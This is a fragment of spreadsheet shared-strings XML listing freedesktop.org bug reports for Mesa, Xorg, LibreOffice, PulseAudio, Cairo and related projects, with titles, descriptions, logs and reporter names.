  </si>
  <si>
    <t>Created attachment 55828
RTF document containing tables
Using Adobe InDesign I created a small RTF file containing 6 small tables. LibreOffice Writer will not import them correctly where as both OpenOffice writer and TextMaker imported the file as per the original.</t>
  </si>
  <si>
    <t>jtownsend</t>
  </si>
  <si>
    <t>MESA-28305</t>
  </si>
  <si>
    <t>OSMesa built with autogen.sh cannot be used</t>
  </si>
  <si>
    <t>When I build mesa with 
git clone git://anongit.freedesktop.org/git/mesa/mesa
cd mesa
./autogen.sh --with-driver=xlib --disable-gallium --without-demos
make -j12
on my Fedora 12 x86_64 workstation the resulting OSMesa library cannot be used because many symbols reffered to in the osmesa library are hidden in the GL library.
nm lib/libOSMesa.so | grep _mesa_free_context_data
                 U _mesa_free_context_data
nm lib/libGL.so | grep _mesa_free_context_data
0000000000078680 t _mesa_free_context_data</t>
  </si>
  <si>
    <t>hobbsk</t>
  </si>
  <si>
    <t>XORG-7773</t>
  </si>
  <si>
    <t>Changing XVideo settings makes video flicker</t>
  </si>
  <si>
    <t>xorg-x11-drv-i810-1.6.0-12.20060717modeset
on FC5 with an Intel 945G
1. Play back a video (using XVideo output) in a player such as xine or MPlayer
2. Change the video settings such as saturation/brightness/contrast
3. See that the video will flicker (display the colorkey then redisplay the
video image)
This makes changing the settings pretty painful as dragging sliders to change
the settings will hide the video for a noticeable time.</t>
  </si>
  <si>
    <t>LIBREOFFICE-37671</t>
  </si>
  <si>
    <t>Update: Brazilian portuguese spelling dictionary &amp; hyphenation</t>
  </si>
  <si>
    <t>Hi
This is an update of the pt-BR spelling and hyá¹•henation dictionaries.
To be included into the soon to be released version.</t>
  </si>
  <si>
    <t>LIBREOFFICE-33574</t>
  </si>
  <si>
    <t>Occitan's files for spellchecker (Myspell) missing for libO's installation</t>
  </si>
  <si>
    <t>Created attachment 42576
The OpenOffice's files for occitan's spellchecker
During the custom installation of LibO in the chooice of dictionary we don't find the oc_FR 's files for spellchecker.
It would be possible to integrate it in the next LibO ?
if yes what can I do to help you ?
Cheers
Bruno</t>
  </si>
  <si>
    <t>bruno.gallart</t>
  </si>
  <si>
    <t>MESA-22882</t>
  </si>
  <si>
    <t>Visual Studio does not compile</t>
  </si>
  <si>
    <t>Using Visual studio 2008 I can not compile the newest Mesa3D 7.5
Previously I was able to compile Mesa3D 7.4.4 with no issues.  
Now with 7.5 I get the following errors:
prog_debug.c : No such file or directory. (Easy enough remove from project)
After removing that .c file (and .h) then when trying to compile gdi project I get unresolved external symbol _mesa_get_compressed_teximage same with _mesa_get_program_register and _mesa_get_teximage  I add the files that have those symbols to the mesa project and rebuild and I get more errors.
If you want I can list them all but I was hoping that someone more familiar with the project could go through and find the errors and update the release.
BTW the zip and GZ/BZ packages are different.  Tried both neither played nice.</t>
  </si>
  <si>
    <t>viperjason</t>
  </si>
  <si>
    <t>XORG-17403</t>
  </si>
  <si>
    <t>Switching to console doesn't work (screen corrupted)</t>
  </si>
  <si>
    <t>Using git version starting from
commit aa4fe63d32e53091f56f7180ece6272037edc1bb
Author: Egbert Eich 
Date:   Fri Aug 29 19:53:16 2008 +0200
    AtomBIOS/Options: Fix AtomBIOS option handling.
    Only get option value when option has actually been set.
I can not switch back to console after starting X. Everything was fine using earlier versions including:
commit afa3d84886df8548527f30016655142b6c6834fb
Author: Hans Ulrich Niedermann 
Date:   Fri Aug 29 14:15:03 2008 +0200
    Comment on which options to document in man page
    Document those options in a single place (i.e. the definition
    of enum RHDOpts) and add references to that place where one
    might look for options to document.</t>
  </si>
  <si>
    <t>LIBREOFFICE-77089</t>
  </si>
  <si>
    <t>WMF rendering: characters are too wide</t>
  </si>
  <si>
    <t>Created attachment 96957
rendered in LibreOffice 32-bit
Try to open https://bugs.freedesktop.org/attachment.cgi?id=93188 (from bug 74336) on a 32-bit operating system (tested on Mac Windows and Linux). The text labels on the graph are too wide some overlap some are cut. See also the reference rendering.</t>
  </si>
  <si>
    <t>PULSEAUDIO-100277</t>
  </si>
  <si>
    <t>Pulseaudio crashes when changing output</t>
  </si>
  <si>
    <t>Created attachment 130308
stacktrace
Pulseaudio crashes almost everytime I switch output profile in plasma-pa.
Version 10.0</t>
  </si>
  <si>
    <t>dolohow</t>
  </si>
  <si>
    <t>XORG-2612</t>
  </si>
  <si>
    <t>Optimise XftGlyphExtents</t>
  </si>
  <si>
    <t>Whilst profiling GTK+ I noticed that Pango calls XftGlyphExtents *heavily* with
a single glyph.  The attached patch special-cases this the nglyphs=1 case with a
single memcpy.
This made my Pango benchmark 10% faster.</t>
  </si>
  <si>
    <t>MESA-38145</t>
  </si>
  <si>
    <t>r600g/evergreen: Incorrect rendering of some effects in doom3</t>
  </si>
  <si>
    <t>Created attachment 47801
screenshot of fire rendering
Some doom3 effects like slightly warped objects behind the fire and glass windows aren't rendered correctly on evergreen with r600g (high quality effects should be enabled in the game settings to reproduce). It was not very noticeable before the commit d1b8f8e8b3b41ab6092fa3f18a4891a0198f64de r600g: don't lookup a vs semantic for position/face but after that commit it is much more visible.</t>
  </si>
  <si>
    <t>ptpzz</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-8979</t>
  </si>
  <si>
    <t>Please add Rob Taylor to HAL group</t>
  </si>
  <si>
    <t>Request for access to 'hal' group for Rob Taylor existing freedesktop login
'robtaylor'
Thanks</t>
  </si>
  <si>
    <t>XORG-1359</t>
  </si>
  <si>
    <t>xcompmgr: GNOME desktop switching issues.</t>
  </si>
  <si>
    <t>If I do the following (in GNOME):
1. (Start xcompmgr -c.)
2. Open any window on any desktop.
3. (optional) Change the transparency of the window (doesn't matter how often
up to now it always works).
4. Switch to another desktop and back.
Now I cannot change the transparency of a window on the original desktop
anymore or at least xcompmgr doesn't care about the change anymore. (i.e.
transset reports changes just as usual but nothing happens.)
I am using X.org 6.8.0 GNOME 2.6.2 xcompmgr and transset from CVS.</t>
  </si>
  <si>
    <t>gb_mail</t>
  </si>
  <si>
    <t>PORTLAND-83979</t>
  </si>
  <si>
    <t>xdg-utils-common is broken xdg-open uses bashism</t>
  </si>
  <si>
    <t>Created attachment 106423
patch for xdg-utils
The latest commit 781023ef997bac433dbc258bd5cfdc1366f2ffa4 not only bumps the version but also adds a t letter breaking syntax. xdg-open uses bashism for years (introduced in commit ba265f969b9061d221915c2528122c44a85ad7c2) and it breaks multigroup desktop files actually (easily verified with Google Chrome sed shows an error because 'localised_name' var receives 3 lines and thus the sed command isn't terminated properly). One of the cases there is [*) and while it works in bash dash uses â€œ[â€ as a meta-character. I've quoted it to make it work.</t>
  </si>
  <si>
    <t>MESA-90748</t>
  </si>
  <si>
    <t>[BDW Bisected]dEQP-GLES3.functional.fbo.completeness.renderable.texture.depth.rg_half_float_oes fails</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Platform: BDW
Libdrm:		(master)libdrm-2.4.61-4-gfde4969176822fe54197b6baa78f8b0ef900baba
Mesa:		(master)10aacf5ae8f3e90e2f0967fbdcf96df93e346e20
Xserver:	(master)xorg-server-1.17.0-157-gcbb7eb73b5399e31a7afb800363504d539df0ecf
Xf86_video_intel:(master)2.99.917-313-gfb1643f0f904eb258da71cd0b8deb8d3ec6dafed
Libva:		(master)4763db1c2133d4e6b92355938ecb6f23a7767b6b
Libva_intel_driver:(master)4a1c4d21f3428b08ef765d7f7de75b97006514ac
Kernel:   (drm-intel-nightly)f9d865e87168eaba908020942f458c40facd6060
Bug detailed description:
-----------------------------
It fails on BDW with Mesa master branch.
good commit: 2c2a92d5b87f669da9fa88fdd094304fcf1eb09a
bad commit: e638841b87a5d9454739195b49c403ca9a22a59e
output:
dEQP Core 2014.x (0xcafebabe) starting..
  target implementation = 'X11 EGL/GLX'
Test case 'dEQP-GLES3.functional.fbo.completeness.renderable.texture.depth.rg_half_float_oes'..
  Fail (Framebuffer checked as incomplete but with wrong status)
Test case duration in microseconds = 4701 us
DONE!
Test run totals:
  Passed:        0/1 (0.0%)
  Failed:        1/1 (100.0%)
  Not supported: 0/1 (0.0%)
  Warnings:      0/1 (0.0%)
Reproduce steps:
---------------------------- 
1. xinit
2. ./deqp-gles3 --deqp-gl-context-type=egl --deqp-case=dEQP-GLES3.functional.fbo.completeness.renderable.texture.depth.rg_half_float_oes</t>
  </si>
  <si>
    <t>CAIRO-91902</t>
  </si>
  <si>
    <t>Core dumped when render some glyphs with specified fonts to PDF backend.</t>
  </si>
  <si>
    <t>Created attachment 118119
core dump testcase
namely render 'è¯•' with the 'Source Han Sans CN' font.
test case attached.</t>
  </si>
  <si>
    <t>iyzsong</t>
  </si>
  <si>
    <t>MESA-50083</t>
  </si>
  <si>
    <t>Xorg hangs (dies) by [drm:i915_hangcheck_elapsed]</t>
  </si>
  <si>
    <t>Created attachment 61787
xorg.0.log
Hello
i've experienced several hang ups with this message:
[ 9261.480667] [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... GPU hung                                                                                 
[ 9261.482409] [drm:i915_do_wait_request] *ERROR* i915_do_wait_request returns -11 (awaiting 2304249 at 2304240 next 2304250)                                          
[ 9261.482470] [drm:i915_reset] *ERROR* Failed to reset chip.
this bug seems like affecting cross-distribution check this:
https://bugzilla.redhat.com/show_bug.cgi?id=684097
notes:
# uname -a lspci | grep VG
Linux linux-7n4p 2.6.37.6-0.11-desktop #1 SMP PREEMPT 2011-12-19 23:39:38 +0100 x86_64 x86_64 x86_64 GNU/Linux
00:02.0 VGA compatible controller: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller (rev 09)
also please note that native and recognized resolution (read from EDID) is 1920x1080 but i've previously added to etc/X11/xorg.conf.d/50-monitor.conf:
# egrep -v ^\ *#\|^$ /etc/X11/xorg.conf.d/50-monitor.conf 
Section Monitor
  Identifier Default Monitor
Option DefaultModes  yes
Modeline 1366x768   85.25  1368 1440 1576 1784  768 771 781 798 -hsync +vsync
Modeline 1600x900  118.25  1600 1696 1856 2112  900 903 908 934 -hsync +vsync
Option PreferredMode  1366x768
EndSection
^^ i have never experienced freeze on native resolution and those modelines are calculated by cvt .. i've found that cvt modelines for EDID modes differ so probably the modelines are not calculated accordingly to this hardware .. check attached Xorg.0.log and check for example cvt|gtf modeline for 1920x1080 Vs one read from EDID ..
regards daniel</t>
  </si>
  <si>
    <t>dpecka</t>
  </si>
  <si>
    <t>DRI-93217</t>
  </si>
  <si>
    <t>[tonga] [powerplay] Radon M395X isn't initialised with the powerplay branch</t>
  </si>
  <si>
    <t>Created attachment 120284
dmesg powerplay
The card doesn't initialise:
amdgpu 0000:01:00.0: Fatal error during GPU init
[TTM] Memory type 2 has not been initialized
amdgpu: probe of 0000:01:00.0 failed with error -1
This is a hybrid system with skylake
I'll attach the dmesg with the powerplay branch and linus's tree
This is with runpm=0
00:00.0 Host bridge [0600]: Intel Corporation Sky Lake Host Bridge/DRAM Registers [8086:1910] (rev 07)
00:01.0 PCI bridge [0604]: Intel Corporation Sky Lake PCIe Controller (x16) [8086:1901] (rev 07)
00:02.0 VGA compatible controller [0300]: Intel Corporation Device [8086:191b] (rev 06)
00:04.0 Signal processing controller [1180]: Intel Corporation Device [8086:1903] (rev 07)
00:14.0 USB controller [0c03]: Intel Corporation Sunrise Point-H USB 3.0 xHCI Controller [8086:a12f] (rev 31)
00:14.2 Signal processing controller [1180]: Intel Corporation Sunrise Point-H Thermal subsystem [8086:a131] (rev 31)
00:16.0 Communication controller [0780]: Intel Corporation Sunrise Point-H CSME HECI #1 [8086:a13a] (rev 31)
00:17.0 SATA controller [0106]: Intel Corporation Sunrise Point-H SATA Controller [AHCI mode] [8086:a103] (rev 31)
00:1c.0 PCI bridge [0604]: Intel Corporation Sunrise Point-H PCI Express Root Port #1 [8086:a110] (rev f1)
00:1c.4 PCI bridge [0604]: Intel Corporation Sunrise Point-H PCI Express Root Port #5 [8086:a114] (rev f1)
00:1c.5 PCI bridge [0604]: Intel Corporation Sunrise Point-H PCI Express Root Port #6 [8086:a115] (rev f1)
00:1c.6 PCI bridge [0604]: Intel Corporation Sunrise Point-H PCI Express Root Port #7 [8086:a116] (rev f1)
00:1d.0 PCI bridge [0604]: Intel Corporation Sunrise Point-H PCI Express Root Port #9 [8086:a118] (rev f1)
00:1f.0 ISA bridge [0601]: Intel Corporation Sunrise Point-H LPC Controller [8086:a14e] (rev 31)
00:1f.2 Memory controller [0580]: Intel Corporation Sunrise Point-H PMC [8086:a121] (rev 31)
00:1f.3 Audio device [0403]: Intel Corporation Sunrise Point-H HD Audio [8086:a170] (rev 31)
00:1f.4 SMBus [0c05]: Intel Corporation Sunrise Point-H SMBus [8086:a123] (rev 31)
01:00.0 Display controller [0380]: Advanced Micro Devices Inc. [AMD/ATI] Amethyst XT [Radeon R9 M295X] [1002:6921]
3b:00.0 Ethernet controller [0200]: Qualcomm Atheros Device [1969:e0a1] (rev 10)
3c:00.0 Network controller [0280]: Qualcomm Atheros QCA6174 802.11ac Wireless Network Adapter [168c:003e] (rev 32)
3d:00.0 Unassigned class [ff00]: Realtek Semiconductor Co. Ltd. RTS5227 PCI Express Card Reader [10ec:5227] (rev 01)
3e:00.0 Non-Volatile memory controller [0108]: Samsung Electronics Co Ltd Device [144d:a802] (rev 01)</t>
  </si>
  <si>
    <t>TELEPATHY-32578</t>
  </si>
  <si>
    <t>Remove keyring support</t>
  </si>
  <si>
    <t>Once all the CMs have SASL support we should remove the gnome-keyring code in Mission Control.
We should probably wait a bit before merging this though. Just adding the branch here for any early review if anyone's keen. :-)</t>
  </si>
  <si>
    <t>SWFDEC-11166</t>
  </si>
  <si>
    <t>swfdec crashes firefox if it cannot access the sound device</t>
  </si>
  <si>
    <t>After installing swfdec and swfdec-mozilla but before I added my user to the audio group I started firefox and tried playing a youtube video. The browser would immediately close. I believe this crash is caused because swfdec expected access to the audio device to be granted and it crashed when it was denied. After adding my user to the audio group the videos successfully played.</t>
  </si>
  <si>
    <t>dressedinblue</t>
  </si>
  <si>
    <t>LIBREOFFICE-58571</t>
  </si>
  <si>
    <t>Invalid ODF 1.2:  tag name text:p</t>
  </si>
  <si>
    <t>Created attachment 71851
Test kit with sample documents and validation results
Save attached spreadsheetsamplesourceodf_4000_12.ods from LibO4 with ODF 1.2 (strict) ant try validator  (or do validation directly with sample)
Result: spreadsheetsamplesourceodf12.ods/content.xml[24217]: Error: tag name text:p is not allowed. Possible tag names are: 
If you save the document from 3.6.4.3 a new validation will be passed without complaints like spreadsheetsamplesourceodf_3643_12.ods)
Operating System: Windows XP
Version: 4.0.0.0.beta1
Last worked in: 3.6.4.3 release</t>
  </si>
  <si>
    <t>DRI-79054</t>
  </si>
  <si>
    <t>[SNB/HSW/BSW]igt/kms_flip some subcases fail</t>
  </si>
  <si>
    <t>Created attachment 99557
dmesg
==System Environment==
--------------------------
Regression: No. 
It's new case
Non-working platforms: HSW
==kernel==
--------------------------
-nightly: 36765340cb068dec1216342bfcdbf2678ec29860(fails)
-queued: bc76e320f21f8bd790a72bd5dc06909617432352(fails)
    Author: Daniel Vetter 
Date:   Tue May 20 22:46:50 2014 +0200
    drm/i915: Drop now misleading DDI comment from dp_link_down
    Since
    commit 2e82a7203182d0883d0f9450d40ad6e1c6578ad9
    Author: Imre Deak 
    Date:   Fri Jan 17 15:46:43 2014 +0200
        drm/i915: don't disable DP port after a failed link training
    and
    commit 5d6a1116c6475404e6505b708320f9579ae19acd
    Author: Imre Deak 
    Date:   Thu Jan 16 18:35:57 2014 +0200
        drm/i915: don't disable the DP port if the link is lost
    we no longer call intel_dp_link_down from generic DP code but only
    from the !HAS_DDI dp encoder functions. hsw/bdw have their own encoder
    disabling callback in intel_ddi.c.
    Hence the early return is no longer needed and the big comment just
    confusing so let's rip it out. To ensure what we don't accidentally
    use this again on ddi encoders add a WARN_ON instead.
    Spotted while reading through intel_dp.c
    Cc: Imre Deak 
    Cc: Paulo Zanoni 
    Signed-off-by: Daniel Vetter 
-fixes: 4ba4801d73d14690ed15774424e8b1d4c18323a5(fails)
    Author: Dave Airlie 
Date:   Tue May 20 09:56:26 2014 +1000
    Merge tag 'drm-intel-fixes-2014-05-16' of git://anongit.freedesktop.org/drm-intel into drm-fixes
    Intel fixes for regressions black screens and hangs for 3.15.
    * tag 'drm-intel-fixes-2014-05-16' of git://anongit.freedesktop.org/drm-intel:
      drm/i915: Increase WM memory latency values on SNB
      drm/i915: restore backlight precision when converting from ACPI
      drm/i915: Use the first mode if there is no preferred mode in the EDID
      drm/i915/dp: force eDP lane count to max available lanes on BDW
      drm/i915/vlv: reset VLV media force wake request register
      drm/i915/SDVO: For sysfs link put directory and target in correct order
      drm/i915: use lane count and link rate from VBT as minimums for eDP
      drm/i915: clean up VBT eDP link param decoding
      drm/i915: consider the source max DP lane count too
==Bug detailed description==
-----------------------------
igt/kms_flip some subcases below fail
igt/kms_flip/vblank-vs-dpms-rpm
igt/kms_flip/vblank-vs-dpms-rpm-interruptible
igt/kms_flip/vblank-vs-modeset-rpm
igt/kms_flip/vblank-vs-modeset-rpm-interruptible
Output:
./kms_flip --run-subtest vblank-vs-dpms-rpm
IGT-Version: 1.6-gc75dcbd (x86_64) (Linux: 3.15.0-rc5_drm-intel-nightly_367653_20140521+ x86_64)
Using monotonic timestamps
Beginning vblank-vs-dpms-rpm on crtc 5 connector 13
  1024x768 60 1024 1048 1184 1344 768 771 777 806 0xa 0x40 65000
.Test assertion failure function run_test_step file kms_flip.c:941:
Last errno: 0 Success
Failed assertion: igt_wait_for_pm_status(IGT_RUNTIME_PM_STATUS_SUSPENDED)
Subtest vblank-vs-dpms-rpm: FAIL
==Reproduce steps==
---------------------------- 
1. ./kms_flip --run-subtest vblank-vs-dpms-rpm</t>
  </si>
  <si>
    <t>DRI-84974</t>
  </si>
  <si>
    <t>[VLV eDP-LVDS bisected] powerdomains: Screen goes blank using xrandr</t>
  </si>
  <si>
    <t>Bug description:
When rotating the screen to the left or right using e.g. xrandr -o left it
goes blank.
I am no longer able to use Ctrl+Alt+F for switching to a console but the
machine is still reachable over network. It also does not switch back when
calling a shell command like xrandr -o left sleep 10 xrandr -o normal. xrandr -o inverted works as expected but calling xrandr -o normal
afterwards also causes the screen to go blank.
The monitor is connected through LVDS I was not able to configure the machine to deliver any output on DP/HDMI/DVI despite trying all BIOS options.
I use Debian Jessie but quick check with some live cds revealed that also Fedora and Ubuntu are affected when the kernel version matches.
Bisect revealed that first commit which showed this behaviour is:
https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=77961eb984c7e5394bd29cc7be2ab0bf0cc7e7b1
It is still present in today's mainline kernel.
System environment:
-- chipset: i915 I guess (the one included in Intel Atom E3825)
-- system architecture: x86_64
package versions (all from debian jessie):
-- libdrm version: 2.4.56-1
-- xserver-xorg-video-intel (from debian jessie): 2:2.21.15-2+b2
-- xserver-xorg version: (from debian jessie): 1:7.7+7
-- Kernel version: Since 77961eb984c7e5394bd29cc7be2ab0bf0cc7e7b1 at least until today's mainline (dfe2c6dcc8ca2cdc662d7c0473e9811b72ef3370)
-- Machine model: Can't tell details about the product but it contains an Intel Atom E3825 CPU and is quite standard apart from that. See attached cpuinfo and lspci for the details.
-- Display connector: LVDS
Please let me know if you need any further information.</t>
  </si>
  <si>
    <t>ws</t>
  </si>
  <si>
    <t>XORG-35714</t>
  </si>
  <si>
    <t>Nouveau: GLSL issue with Gnome Shell</t>
  </si>
  <si>
    <t>Nouveau seems to have problems rendering Gnome Shell's applications menu.
Here is how it looks like:
http://i53.tinypic.com/4udmpy.png
Here is the code for their use of GLSL:
http://git.gnome.org/browse/gnome-shell/tree/src/st/st-scroll-view-fade.c
Here is the related bug on Gnome Shell:
https://bugzilla.gnome.org/show_bug.cgi?id=645814</t>
  </si>
  <si>
    <t>venemo</t>
  </si>
  <si>
    <t>XORG-1132</t>
  </si>
  <si>
    <t>White space  problems with BSD make</t>
  </si>
  <si>
    <t>Leading tabs in non command lines are not valid in BSD make.</t>
  </si>
  <si>
    <t>DBUS-14125</t>
  </si>
  <si>
    <t>dbus_g_proxy_dispose modifies a hash table over which it is iterating</t>
  </si>
  <si>
    <t>When running the telepathy-glib regression tests under valgrind:
==32347== Invalid read of size 4
==32347==    at 0x4267043: g_hash_table_foreach (ghash.c:679)
==32347==    by 0x42F4A10: dbus_g_proxy_dispose (dbus-gproxy.c:1443)
==32347==    by 0x4215C2F: g_object_run_dispose (gobject.c:573)
==32347==    by 0x804948F: main (test-call-cancellation.c:261)
==32347==  Address 0x44e8138 is 8 bytes inside a block of size 16 free'd
==32347==    at 0x402465C: free (vg_replace_malloc.c:323)
==32347==    by 0x427B9D0: g_free (gmem.c:187)
==32347==    by 0x4267356: g_hash_node_destroy (ghash.c:860)
==32347==    by 0x4267D09: g_hash_table_remove (ghash.c:448)
==32347==    by 0x42F1651: dbus_g_proxy_cancel_call (dbus-gproxy.c:2668)
==32347==    by 0x42F16C3: cancel_pending_call (dbus-gproxy.c:1428)
==32347==    by 0x4267042: g_hash_table_foreach (ghash.c:680)
==32347==    by 0x42F4A10: dbus_g_proxy_dispose (dbus-gproxy.c:1443)
==32347==    by 0x4215C2F: g_object_run_dispose (gobject.c:573)
==32347==    by 0x804948F: main (test-call-cancellation.c:261)
It turns out that dbus_g_proxy_dispose iterates the pending calls with g_hash_table_foreach calling cancel_pending_call for each one this causes a call to g_hash_table_remove.
However you're not allowed to modify a GHashTable while g_hash_table_foreach is running.
dbus_g_proxy_dispose should instead call g_hash_table_foreach_remove with some refactoring to the call-cancellation machinery to fit into this model.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-300</t>
  </si>
  <si>
    <t>we should control DNS</t>
  </si>
  <si>
    <t>The pdx hostname should not be used IMHO for general use or public facing
purposes.  I notice some people using it in email addresses and mailing
list addresses which I think is bad because there is no guarantee pdx will
remain a hostname forever as it doesn't actually mean anything as far as I
can tell.  It is generally a bad idea to use hostnames for standard services
which might randomly change in the future.  Instead standardized CNAMEs should
be used for all services.
I recommend:
lists.freedesktop.org -- mailman lists
shell.freedesktop.org -- user shell accounts
bugs.freedesktop.org  -- bugzilla
www.freedesktop.org   -- website
ftp.freedesktop.org   -- ftp
mail.freedesktop.org  -- smtp/pop/imap access (if applicable)
freedesktop.org       -- default for user email addresses
We might need a DNS guru to do this.  I'd take a shot at it but I'm
not very DNS or apache config savvy.</t>
  </si>
  <si>
    <t>CAIRO-12267</t>
  </si>
  <si>
    <t>Cairo 1.4.10 does not yet support the requested image format</t>
  </si>
  <si>
    <t>Error: Cairo 1.4.10 does not yet support the requested image format:
        Depth: 8
        Alpha mask: 0x00000000
        Red   mask: 0x00000007
        Green mask: 0x00000038
        Blue  mask: 0x000000c0</t>
  </si>
  <si>
    <t>Florian.Lindner</t>
  </si>
  <si>
    <t>MESA-98415</t>
  </si>
  <si>
    <t>Vulkan Driver JSON file contains incorrect field</t>
  </si>
  <si>
    <t>The Vulkan Driver JSON files in Mesa contain the field abi_version which should correctly be labeled api_version.
This is not currently causing a problem but could at some point when the next version of Vulkan were to come out and the Vulkan loader started paying attention to these fields.</t>
  </si>
  <si>
    <t>marky</t>
  </si>
  <si>
    <t>XORG-105403</t>
  </si>
  <si>
    <t>[modesetting] Xorg shows black screen using modesetting in ubuntu 17.1064bit</t>
  </si>
  <si>
    <t>Created attachment 137908
Xorg.0.log
Hi :
i am having black screen when trying to enable modesetting with Xorg with SNA works well please see below my configuration and the issue.
any help here would be appreciated :)
kernel versions used : 
- 4.13.0-32-generic
- latest drm-tip
=================================================
commit 6c6e1006b3c9ba90b68793e26702d2267715baee
Author:     Jani Nikula 
AuthorDate: Thu Mar 8 12:03:13 2018 +0200
Commit:     Jani Nikula 
CommitDate: Thu Mar 8 12:03:13 2018 +0200
    drm-tip: 2018y-03m-08d-10h-02m-19s UTC integration manifest
this is my configuration file for modesetting
=============================================
$ cat 20-modesetting.conf
Section Device
  Identifier Intel Graphics
  Driver     modesetting
  Option     AccelMethod glamor
EndSection
this are the errors that shows Xorg.0.log
============================================================================
$ : cat -n Xorg.0.log | grep (EE)
(WW) warning (EE) error (NI) not implemented (??) unknown.
[     4.425] (EE) modeset(0): failed to set mode: Invalid argument
[     5.258] (EE) modeset(0): failed to set mode: No space left on device
this are my commits for the related drivers:
====================================================
component: xserver
    tag: xorg-server-1.19.99.901-21-g90e0cdd
    commit: 90e0cdd42dfda2accfadffa5c550712696902e14
Component: mesa
    tag: 17.3-branchpoint-3811-g55376cb
    commit: 55376cb31e2f495a4d872b4ffce2135c3365b873
Component: xf86-video-intel
    tag: 2.99.917-814-gaa36399
    commit: aa36399cca1250d878a4608528a535faeb0e931a
this are the mesa options when compiled:
=========================================
  $ ./configure --prefix=/opt/X11R7 --libdir=/opt/X11R7/lib/x86_64-linux-gnu --with-dri-drivers=i965swrast --with-dri-driverdir=/opt/X11R7/lib/dri --enable-gles1 --enable-gles2 --enable-shared-glapi --with-egl-platforms=x11drm --enable-texture-float --enable-gbm --enable-glx-tls --without-gallium-drivers --enable-debug
this are the xserver options when compiled:
=========================================
  $ ./configure --prefix=/opt/X11R7 --libdir=/opt/X11R7/lib --enable-ipv6 --enable-dri --enable-xvfb --enable-composite --enable-xcsecurity --enable-libunwind --enable-xorg --enable-xephyr --enable-glamor -enable-kdrive --enable-config-udev --enable-systemd-logind --enable-suid-wrapper --enable-dri3 --disable-install-setuid --enable-record --disable-static --libexecdir=/opt/X11R7/lib/xorg-server --sysconfdir=/opt/X11R7/etc --sysconfdir=/opt/X11R7/etc --localstatedir=/opt/X11R7/var --with-xkb-path=/opt/X11R7/share/X11/xkb --with-xkb-output=/opt/X11R7/lib/xkb --with-fontrootdir=/usr/share/fonts --with-sha1=libgcrypt --enable-glamor --enable-debug
this are the xf86-video-intel options when compiled:
=========================================
 $ ./configure --prefix=/opt/X11R7 --libdir=/opt/X11R7/lib --enable-debug --enable-kms --enable-sna
the output of the drivers into Xorg.0.log
=========================================
$ : cat Xorg.0.log | grep -i sna
$ : cat Xorg.0.log | grep -i modesetting -A8
[     4.456] (II) LoadModule: modesetting
[     4.457] LoaderOpen(/opt/X11R7/lib/xorg/modules/drivers/modesetting_drv.so)
[     4.457] (II) Loading /opt/X11R7/lib/xorg/modules/drivers/modesetting_drv.so
[     4.458] (II) Module modesetting: vendor=X.Org Foundation
[     4.458] 	compiled for 1.19.99.901 module version = 1.19.99
[     4.458] 	Module class: X.Org Video Driver
[     4.458] 	ABI class: X.Org Video Driver version 24.0
[     4.458] (II) modesetting: Driver for Modesetting Kernel Drivers: kms
[     4.458] (II) modeset(0): using drv /dev/dri/card0
[     4.458] (WW) VGA arbiter: cannot open kernel arbiter no multi-card support
[     4.458] (II) modeset(0): Creating default Display subsection in Screen section
	Default Screen Section for depth/fbbpp 24/32
[     4.458] (==) modeset(0): Depth 24 (==) framebuffer bpp 32
[     4.458] (**) modeset(0): Option AccelMethod glamor
[     4.458] (==) modeset(0): RGB weight 888
[     4.458] (==) modeset(0): Default visual is TrueColor
$ : cat Xorg.0.log | grep -i glamor -A8
[     4.458] (**) modeset(0): Option AccelMethod glamor
[     4.458] (==) modeset(0): RGB weight 888
[     4.458] (==) modeset(0): Default visual is TrueColor
[     4.458] (II) Loading sub module glamoregl
[     4.458] (II) LoadModule: glamoregl
[     4.458] LoaderOpen(/opt/X11R7/lib/xorg/modules/libglamoregl.so)
[     4.458] (II) Loading /opt/X11R7/lib/xorg/modules/libglamoregl.so
[     4.465] (II) Module glamoregl: vendor=X.Org Foundation
[     4.465] 	compiled for 1.19.99.901 module version = 1.0.1
[     4.465] 	ABI class: X.Org ANSI C Emulation version 0.4
[     4.506] (II) modeset(0): glamor X acceleration enabled on Mesa DRI Intel(R) HD Graphics 6000 (Broadwell GT3) 
[     4.506] (II) modeset(0): glamor initialized
attachments
===========================
- Xorg.0.log
- dmesg.log
- kern.log</t>
  </si>
  <si>
    <t>LIBREOFFICE-61515</t>
  </si>
  <si>
    <t>bogus code comment cleanup ...</t>
  </si>
  <si>
    <t>I was reading: framework/source/fwe/classes/addonsoptions.cxx and was annoyed to see great blocks of bogus comments for tiny otherwise readable methods of the form:
//*****************************************************************************************************************
//  constructor
//*****************************************************************************************************************
or:
//*****************************************************************************************************************
//  private method
//*****************************************************************************************************************
Those should all be ripped out with prejudice and any others nearby as well to make the code more readable :-)
Thanks !</t>
  </si>
  <si>
    <t>soryy708</t>
  </si>
  <si>
    <t>PULSEAUDIO-98603</t>
  </si>
  <si>
    <t>Thread-local storage not supported on compiler shipped with Xcode</t>
  </si>
  <si>
    <t>It's currently not possible to compile PulseAudio master on macOS 10.12 with the compiler shipped with Xcode 8 which does not support thread-local storage.
  CC       pulsecore/libpulsecore_9.0_la-thread-mq.lo
pulsecore/thread-mq.c:35:1: error: thread-local storage is not supported for the
      current target
PA_STATIC_TLS_DECLARE_NO_FREE(thread_mq)
^
./pulsecore/thread.h:100:12: note: expanded from macro
      'PA_STATIC_TLS_DECLARE_NO_FREE'
    static __thread void *name##_tls = NULL                            \
           ^
1 error generated.
Is it possible to use a portable substitute if one exists? I know Boost has one though that doesn't help since this is C.</t>
  </si>
  <si>
    <t>philip.chimento</t>
  </si>
  <si>
    <t>XORG-13227</t>
  </si>
  <si>
    <t>VT switch broken</t>
  </si>
  <si>
    <t>I just get a white screen.
(II) AIGLX: Suspending AIGLX clients for VT switch
(II) intel(0): fbc disabled on pipe a
(II) intel(0): xf86UnbindGARTMemory: unbind key 1
(II) intel(0): xf86UnbindGARTMemory: unbind key 2
(II) intel(0): xf86UnbindGARTMemory: unbind key 0
(II) intel(0): xf86UnbindGARTMemory: unbind key 3
(WW) Open ACPI failed (/var/run/acpid.socket) (No such file or directory)
(II) No APM support in BIOS or kernel
(II) AIGLX: Resuming AIGLX clients after VT switch
